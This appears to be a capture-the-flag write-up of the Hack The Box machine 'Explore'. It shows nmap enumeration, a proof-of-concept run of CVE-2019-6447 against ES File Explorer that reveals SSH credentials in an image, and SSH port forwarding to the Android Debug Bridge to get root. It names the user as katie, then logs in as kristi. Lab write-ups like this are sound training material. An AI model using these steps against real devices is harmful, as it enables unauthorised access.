Hack The Box - Explore

Posted on | In

info_card

User

Explore is an easy rated machine on HackTheBox by bertolis. For the user part we will exploit an open port for ES file explorer to retrieve ssh credentials in a jpg file. After this we will abuse adb being enabled and listening to get a shell as the root user after forwarding it to our machine.

Nmap

As always we start our enumeration off with a nmap scan against all ports, followed by a script and version detection scan against the open ones to get an overview of the initial attack surface.

All ports

1
2
3
4
5
6
7
8
9
10
11
12
$ sudo nmap -p- -T4 10.129.167.241
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 20:21 GMT
Nmap scan report for 10.129.167.241
Host is up (0.044s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
38363/tcp open     unknown
59777/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 82.24 seconds

Script and version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
$ sudo nmap -sC -sV -p 2222,5555,38363,59777 10.129.167.241
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 20:25 GMT
Nmap scan report for 10.129.167.241
Host is up (0.033s latency).

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
38363/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:04 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Sun, 27 Jun 2021 20:27:04 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Sun, 27 Jun 2021 20:27:10 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:25 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:10 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:25 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:25 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 20:27:25 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
...[snip]...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.22 seconds

ES file explorer

Port 59777 on an android device is normally used for ES file explorer. Opening the port in our webbrowser we see that directory listing is disabled.

listing_disabled

The running installation is vulnerable to CVE-2019-6447, which let’s us read files from the device or start an app. Looking through the images on the device we find an interesting looking creds.jpg file.

1
2
3
4
5
6
7
8
$ python poc.py  --cmd listPics --ip 10.129.167.241
[*] Executing command: listPics on 10.129.167.241
[*] Server responded with: 200

{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}

The image shows a note with the password for the user katie. Trying it on the open ssh port with the credentials kristi:Kr1sT!5h@Rp3xPl0r3! we get access to the device.

creds

1
2
3
4
5
6
$ ssh kristi@10.129.167.241 -p 2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $

Looking around in the storage folder which also had the image in it we find the user flag.

1
2
:/storage/emulated/0 $ wc -c user.txt
33 user.txt

Root

We earlier saw that port 5555 showed up in our nmap scan. This is most likely the Android Debug Bridge being enabled on the device.

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.” — Android’s developer portal

Being able to communicate with it would most likely give us unauthenticated root access to the device. Checking it again we can see it is listening on all interfaces but seems to be filtered for us.

1
2
3
4
5
:/storage/emulated/0 $ ss -ln
Netid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port
...[snip]...
tcp    LISTEN     0      50        *:2222                  *:*
tcp    LISTEN     0      4         *:5555                  *:*

We can however access it if we forward the port to our machine with ssh. For this we open the ssh console in our connection by entering ~C on a new line and issue the local port forward.

1
2
3
:/storage/emulated/0 $
ssh> -L:5555:127.0.0.1:5555
Forwarding port.

After installing adb on our machine with apt install adb we kill the adb server, in case it was already running, so it restarts on the next command.

1
$ adb kill-server

We then list all devices to be able to connect to our target with its device name in the next step.

1
2
3
4
5
6
7
$ adb devices
* daemon not running; starting now at tcp:5037

* daemon started successfully
List of devices attached
emulator-5554   device

Now we can simply connect to the debugging bridge as the root user and drop into a root shell with adb shell.

1
2
$ adb -s emulator-5554 root
restarting adbd as root

1
2
3
$ adb shell
x86_64:/ # whoami
root

Being the root user we can now add the flag to our collection

1
2
x86_64:/ # wc -c /data/root.txt
33 /data/root.txt